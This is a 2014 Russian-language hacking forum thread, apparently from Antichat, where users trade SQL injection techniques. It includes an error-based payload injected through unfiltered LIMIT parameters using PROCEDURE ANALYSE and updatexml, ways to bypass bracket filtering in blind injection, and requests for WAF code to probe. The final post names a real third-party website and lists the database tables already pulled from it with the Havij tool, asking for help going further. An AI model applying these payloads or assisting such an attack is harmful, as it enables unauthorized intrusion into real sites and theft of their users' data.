 |
|
20.06.2014, 23:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от qaz
никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу
Попробуй так:
Код:
SELECT name FROM #__menu LIMIT 0,1
|
|
|
20.06.2014, 23:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от int
Попробуй так:
Код:
SELECT name FROM #__menu LIMIT 0,1
не, там только титлы
|
|
|
|
20.06.2014, 23:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от qaz
не, там только титлы
А в колонке link?
SELECT link FROM #__menu
|
|
|
|
21.06.2014, 15:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
При фильтрации скобок в boolean based blind sql injection есть вектора?
|
|
|
|
21.06.2014, 15:38
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от int
При фильтрации скобок в boolean based blind sql injection есть вектора?
Заготовок, которые можно подставить, нет. Раскрутить возможно.
Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.
|
|
|
|
21.06.2014, 21:19
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Сообщение от int
При фильтрации скобок в boolean based blind sql injection есть вектора?
Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести
|
|
|
|
21.06.2014, 22:15
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 12
С нами:
9176038
Репутация:
8
|
|
Сообщение от XAMEHA
Заготовок, которые можно подставить, нет. Раскрутить возможно.
Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.
URL Encode и Double Url Encode забыл упомянуть.
|
|
|
|
22.06.2014, 00:12
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от int
Как раскрутить такое:
Код:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
где $limitstart, $limit - не фильтруются. Новонайденный вектор:
Сообщение от None
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
|
|
|
|
22.06.2014, 02:10
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести
Имел ввиду круглые, а не знак больше/меньше.
BigBear, пробовал - не проходит.
Сообщение от YaBtr
Новонайденный вектор:
Спасибо!
Вдогонку спрошу: какие есть популярные WAF (или модули для joomla), которые режут все спец символы, но не трогают sql операторы. Хочу покопаться в исходниках.
|
|
|
|
22.06.2014, 21:24
|
|
Новичок
Регистрация: 15.03.2007
Сообщений: 20
С нами:
10083965
Репутация:
19
|
|
Приветствую,
Помогите раскрутить иньекцию
Код:
http://sochi-h ome.com/objects/novostroyki.html?types=1
На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще MySQL error based injection method
Через него из проги Havij получил ДБ и Таблицы
Код:
Current DB: urchenko_home
Table found: blocks
Table found: catalogcats
Table found: catalogitems
Table found: cats
Table found: content
Table found: forms
Table found: formsdata
Table found: formsfields
Table found: general
Table found: menu
Table found: menus
Table found: photos
Table found: photositems
Table found: poller
Table found: poller_option
Table found: poller_vote
Table found: ratings
Table found: responses
Table found: users
Но далее Havij идти не хочет и не выводит поля таблиц. |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
